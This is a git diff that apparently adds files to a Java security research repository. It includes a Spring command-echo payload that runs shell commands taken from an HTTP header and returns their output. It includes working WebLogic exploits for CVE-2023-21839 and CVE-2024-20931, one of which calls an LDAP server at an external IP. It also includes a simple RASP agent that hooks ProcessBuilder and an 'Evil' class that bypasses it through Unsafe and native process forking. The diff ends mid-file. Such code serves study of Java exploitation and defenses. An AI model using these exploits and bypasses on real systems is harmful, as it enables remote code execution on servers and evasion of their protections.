+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/351円200円232円347円224円250円345円233円236円346円230円276円344円273円243円347円240円201円/SpringEcho.java" "b/JavaSecurity/Trick/351円200円232円347円224円250円345円233円236円346円230円276円344円273円243円347円240円201円/SpringEcho.java"
new file mode 100644
index 00000000..7b76f24d
--- /dev/null
+++ "b/JavaSecurity/Trick/351円200円232円347円224円250円345円233円236円346円230円276円344円273円243円347円240円201円/SpringEcho.java"
@@ -0,0 +1,45 @@
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+
+import java.io.Serializable;
+import java.lang.reflect.Method;
+import java.util.Scanner;
+
+public class SpringEcho extends AbstractTranslet implements Serializable {
+ public SpringEcho() throws Exception{
+ Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
+ Method m = c.getMethod("getRequestAttributes");
+ Object o = m.invoke(null);
+ c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
+ m = c.getMethod("getResponse");
+ Method m1 = c.getMethod("getRequest");
+ Object resp = m.invoke(o);
+ Object req = m1.invoke(o); // HttpServletRequest
+ Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
+ Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
+ getHeader.setAccessible(true);
+ getWriter.setAccessible(true);
+ Object writer = getWriter.invoke(resp);
+ String cmd = (String)getHeader.invoke(req, "cmd");
+ String[] commands = new String[3];
+ String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+ if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
+ commands[0] = "cmd";
+ commands[1] = "/c";
+ } else {
+ commands[0] = "/bin/sh";
+ commands[1] = "-c";
+ }
+ commands[2] = cmd;
+ writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
+ writer.getClass().getDeclaredMethod("flush").invoke(writer);
+ writer.getClass().getDeclaredMethod("close").invoke(writer);
+ }
+
+ @Override
+ public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws com.sun.org.apache.xalan.internal.xsltc.TransletException {
+ }
+ @Override
+ public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.dtm.DTMAxisIterator iterator, com.sun.org.apache.xml.internal.serializer.SerializationHandler handler) throws com.sun.org.apache.xalan.internal.xsltc.TransletException {
+
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Weblogic/CVE-2023-21839/CVE_2023_21839.java b/JavaSecurity/Weblogic/CVE-2023-21839/CVE_2023_21839.java
new file mode 100644
index 00000000..27fa5e5f
--- /dev/null
+++ b/JavaSecurity/Weblogic/CVE-2023-21839/CVE_2023_21839.java
@@ -0,0 +1,43 @@
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+import java.lang.reflect.Field;
+import java.util.Hashtable;
+import java.util.Random;
+
+public class CVE_2023_21839 {
+ static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
+ static String HOW_TO_USE="[*]exploit start";
+
+ private static InitialContext getInitialContext(String url)throws NamingException
+ {
+ Hashtable<string,string> env = new Hashtable<string,string>();
+ env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
+ env.put(Context.PROVIDER_URL, url);
+ return new InitialContext(env);
+ }
+ public static void main(String args[]) throws Exception {
+ if(args.length <2){ + System.out.println(HOW_TO_USE); + System.exit(0); + } + String t3Url = "localhost:7001"; + String ldapUrl = "ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiBDYWxj"; + InitialContext c=getInitialContext("t3://"+t3Url); + Hashtable<string,string> env = new Hashtable<string,string>();
+ env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
+ weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
+ Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
+ jndiEnvironment.setAccessible(true);
+ jndiEnvironment.set(f,env);
+ Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
+ remoteJNDIName.setAccessible(true);
+ remoteJNDIName.set(f,ldapUrl);
+ String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
+ try{
+ c.bind(bindName,f);
+ c.lookup(bindName);
+ }catch(Exception e){ }
+
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Weblogic/CVE-2024-20931/exp.java b/JavaSecurity/Weblogic/CVE-2024-20931/exp.java
new file mode 100644
index 00000000..e9808f93
--- /dev/null
+++ b/JavaSecurity/Weblogic/CVE-2024-20931/exp.java
@@ -0,0 +1,45 @@
+package com.supeream;
+
+import weblogic.deployment.jms.ForeignOpaqueReference;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import java.lang.reflect.Field;
+import java.util.Hashtable;
+
+public class CVE_2024_209321 {
+ public static void main(String[] args) throws Exception {
+ String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
+
+ // 创建用来远程绑定对象的InitialContext
+ String url = "t3://127.0.0.1:7001"; // 目标机器
+ Hashtable env1 = new Hashtable();
+ env1.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
+ env1.put(Context.PROVIDER_URL, url); // 目标
+ InitialContext c = new InitialContext(env1);
+
+ // ForeignOpaqueReference的jndiEnvironment属性
+ Hashtable env2 = new Hashtable();
+ env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
+ env2.put("datasource", "rmi://127.0.0.1:1099/ygevmj");
+
+ // ForeignOpaqueReference的jndiEnvironment和remoteJNDIName属性
+ ForeignOpaqueReference f = new ForeignOpaqueReference();
+ Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
+ jndiEnvironment.setAccessible(true);
+ jndiEnvironment.set(f, env2);
+ Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
+ remoteJNDIName.setAccessible(true);
+ String ldap = "rmi://127.0.0.1:1099/ygevmj";
+ remoteJNDIName.set(f, ldap);
+
+ // 远程绑定ForeignOpaqueReference对象
+ c.rebind("glassy", f);
+
+ // lookup查询ForeignOpaqueReference对象
+ try {
+ c.lookup("glassy");
+ } catch (Exception e) {
+ }
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/.gitignore" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/.gitignore"
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/.gitignore"
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/pom.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/pom.xml"
new file mode 100644
index 00000000..eb05d286
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/pom.xml"
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+
+ <groupid>com.test</groupid>
+ <artifactid>test</artifactid>
+ <version>1.0-SNAPSHOT</version>
+
+ <properties>
+ <maven.compiler.source>8</maven.compiler.source>
+ <maven.compiler.target>8</maven.compiler.target>
+ </properties>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-jar-plugin</artifactid>
+ <configuration>
+ <archive>
+ <manifestentries>
+ <main-class>com.test.Main</main-class>
+ </manifestentries>
+ </archive>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+</project>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/java/com/test/Main.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/java/com/test/Main.java"
new file mode 100644
index 00000000..ad9e8cf8
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/java/com/test/Main.java"
@@ -0,0 +1,18 @@
+package com.test;
+
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+
+public class Main {
+ public static void main(String[] args) throws InterruptedException, IOException {
+ System.out.println("main start!");
+ ProcessBuilder processBuilder = new ProcessBuilder();
+ processBuilder.command("cmd", "whoami");
+ Process process = processBuilder.start();
+ InputStream inputStream = process.getInputStream();
+ BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream, "gbk"));
+ System.out.println(bufferedReader.readLine());
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..08be0616
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>RCE-Test</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..3ba7eab2
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$RCE-Test</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/RCE-Test/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/pom.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/pom.xml"
new file mode 100644
index 00000000..e89b00eb
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/pom.xml"
@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+
+ <groupid>com.drunkbaby.javaagent</groupid>
+ <artifactid>java-agent</artifactid>
+ <version>1.0-SNAPSHOT</version>
+
+ <dependencies>
+ <dependency>
+ <groupid>org.javassist</groupid>
+ <artifactid>javassist</artifactid>
+ <version>3.27.0-GA</version>
+ </dependency>
+ </dependencies>
+
+ <properties>
+ <maven.compiler.source>8</maven.compiler.source>
+ <maven.compiler.target>8</maven.compiler.target>
+ </properties>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-jar-plugin</artifactid>
+ </plugin>
+
+ <plugin>
+ <artifactid>maven-assembly-plugin</artifactid>
+ <configuration>
+ <archive>
+ <manifestentries>
+ <premain-class>com.drunkbaby.javagent.PreMain</premain-class>
+ <can-redefine-classes>true</can-redefine-classes>
+ <can-retransform-classes>true</can-retransform-classes>
+ </manifestentries>
+ </archive>
+ <descriptorrefs>
+ <descriptorref>jar-with-dependencies</descriptorref>
+ </descriptorrefs>
+ </configuration>
+ <executions>
+ <execution>
+ <id>make-assembly</id>
+ <phase>package</phase>
+ <goals>
+ <goal>single</goal>
+ </goals>
+ </execution>
+ </executions>
+ </plugin>
+ </plugins>
+ </build>
+</project>
\ No newline at end of file
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/java/com/drunkbaby/javagent/PreMain.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/java/com/drunkbaby/javagent/PreMain.java"
new file mode 100644
index 00000000..695047f1
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/java/com/drunkbaby/javagent/PreMain.java"
@@ -0,0 +1,33 @@
+package com.drunkbaby.javagent;
+
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.lang.instrument.Instrumentation;
+import java.lang.instrument.UnmodifiableClassException;
+
+public class PreMain {
+ public static void premain(String agentArgs, Instrumentation inst) throws IOException, UnmodifiableClassException {
+ // 先测试一次使用ProcessBuilder获取当前路径
+ System.out.println("\n");
+ ProcessBuilder processBuilder = new ProcessBuilder();
+ processBuilder.command("cmd", "/c", "chdir");
+ Process process = processBuilder.start();
+ BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(process.getInputStream(), "gbk"));
+ System.out.println(bufferedReader.readLine());
+
+ // 添加ClassFileTransformer类
+ ProcessBuilderHook processBuilderHook = new ProcessBuilderHook(inst);
+ inst.addTransformer(processBuilderHook, true);
+
+ // 获取所有jvm中加载过的类
+ Class[] allLoadedClasses = inst.getAllLoadedClasses();
+ for (Class aClass : allLoadedClasses) {
+ if (inst.isModifiableClass(aClass) && !aClass.getName().startsWith("java.lang.invoke.LambdaForm")){
+ // 调用instrumentation中所有的ClassFileTransformer#transform方法,实现类字节码修改
+ inst.retransformClasses(new Class[]{aClass});
+ }
+ }
+ System.out.println("++++++++++++++++++hook finished++++++++++++++++++\n");
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/java/com/drunkbaby/javagent/ProcessBuilderHook.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/java/com/drunkbaby/javagent/ProcessBuilderHook.java"
new file mode 100644
index 00000000..3e3d479d
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/java/com/drunkbaby/javagent/ProcessBuilderHook.java"
@@ -0,0 +1,51 @@
+package com.drunkbaby.javagent;
+
+import javassist.*;
+
+import java.io.IOException;
+import java.lang.instrument.ClassFileTransformer;
+import java.lang.instrument.Instrumentation;
+import java.security.ProtectionDomain;
+
+public class ProcessBuilderHook implements ClassFileTransformer {
+ private Instrumentation inst;
+ private ClassPool classPool;
+ public ProcessBuilderHook(Instrumentation inst){
+ this.inst = inst;
+ this.classPool = new ClassPool(true);
+ }
+
+ public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) {
+ if (className.equals("java/lang/ProcessBuilder")){
+ CtClass ctClass = null;
+ try {
+ // 找到ProcessBuilder对应的字节码
+ ctClass = this.classPool.get("java.lang.ProcessBuilder");
+ // 获取所有method
+ CtMethod[] methods = ctClass.getMethods();
+ // 0ドル代表this,这里this = 用户创建的ProcessBuilder实例对象
+ String src = "if (0ドル.command.get(0).equals(\"cmd\"))" +
+ "{System.out.println(\"危险!\");" +
+ "System.out.println();"+
+ "return null;}";
+ for (CtMethod method : methods) {
+ // 找到start方法,并插入拦截代码
+ if (method.getName().equals("start")){
+ method.insertBefore(src);
+ break;
+ }
+ }
+ classfileBuffer = ctClass.toBytecode();
+ }
+ catch (Exception e) {
+ e.printStackTrace();
+ }
+ finally {
+ if (ctClass != null){
+ ctClass.detach();
+ }
+ }
+ }
+ return classfileBuffer;
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/MANIFEST.MF" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/MANIFEST.MF"
new file mode 100644
index 00000000..4d5eae31
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/MANIFEST.MF"
@@ -0,0 +1,5 @@
+Manifest-Version: 1.0
+Premain-Class: com.drunkbaby.javagent.PreMain
+Can-Retransform-Classes: true
+Can-Redefine-Classes: true
+Can-Set-Native-Method-Prefix: true
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..0a4b8ca7
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>agent</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..f5e184db
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$agent</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/agent/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/pom.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/pom.xml"
new file mode 100644
index 00000000..82bc48d4
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/pom.xml"
@@ -0,0 +1,12 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <parent>
+ <groupid>org.example</groupid>
+ <artifactid>java_rasp</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ </parent>
+ <artifactid>bypass</artifactid>
+ <name>Archetype - bypass</name>
+ <url>http://maven.apache.org</url>
+</project>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/drunkbaby/Evil.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/drunkbaby/Evil.java"
new file mode 100644
index 00000000..fdf8d094
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/drunkbaby/Evil.java"
@@ -0,0 +1,64 @@
+package com.drunkbaby;
+
+import sun.misc.Unsafe;
+
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+
+public class Evil {
+ public Evil() throws Exception {
+ Field theUnsafeField = Unsafe.class.getDeclaredField("theUnsafe");
+ theUnsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) theUnsafeField.get(null);
+
+ Class clazz = Class.forName("java.lang.UNIXProcess");
+ Object obj = unsafe.allocateInstance(clazz);
+
+ String[] cmd = new String[] {"bash", "-c", "touch /tmp/success"};
+
+ byte[][] cmdArgs = new byte[cmd.length - 1][];
+ int size = cmdArgs.length;
+
+ for (int i = 0; i < cmdArgs.length; i++) { + cmdArgs[i] = cmd[i + 1].getBytes(); + size += cmdArgs[i].length; + } + + byte[] argBlock = new byte[size]; + int i = 0; + + for (byte[] arg : cmdArgs) { + System.arraycopy(arg, 0, argBlock, i, arg.length); + i += arg.length + 1; + } + + int[] envc = new int[1]; + int[] std_fds = new int[]{-1, -1, -1}; + + Field launchMechanismField = clazz.getDeclaredField("launchMechanism"); + Field helperpathField = clazz.getDeclaredField("helperpath"); + + launchMechanismField.setAccessible(true); + helperpathField.setAccessible(true); + + Object launchMechanism = launchMechanismField.get(obj); + byte[] helperpath = (byte[]) helperpathField.get(obj); + + int ordinal = (int) launchMechanism.getClass().getMethod("ordinal").invoke(launchMechanism); + + Method forkMethod = clazz.getDeclaredMethod("RASP_forkAndExec", int.class, byte[].class, byte[].class, byte[].class, int.class, byte[].class, int.class, byte[].class, int[].class, boolean.class); + forkMethod.setAccessible(true); + forkMethod.invoke(obj, ordinal + 1, helperpath, toCString(cmd[0]), argBlock, cmdArgs.length, null, envc[0], null, std_fds, false); + } + + public byte[] toCString(String s) { + if (s == null) { + return null; + } + byte[] bytes = s.getBytes(); + byte[] result = new byte[bytes.length + 1]; + System.arraycopy(bytes, 0, result, 0, bytes.length); + result[result.length - 1] = (byte) 0; + return result; + } +} \ No newline at end of file diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/drunkbaby/poc.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/drunkbaby/poc.xml" new file mode 100644 index 00000000..7179707b --- /dev/null +++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/drunkbaby/poc.xml" @@ -0,0 +1,11 @@ +<?xml version="1.0" encoding="UTF-8" ?>
+<beans xmlns="http://www.springframework.org/schema/beans" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+ <bean id="data">
+ <constructor-arg>
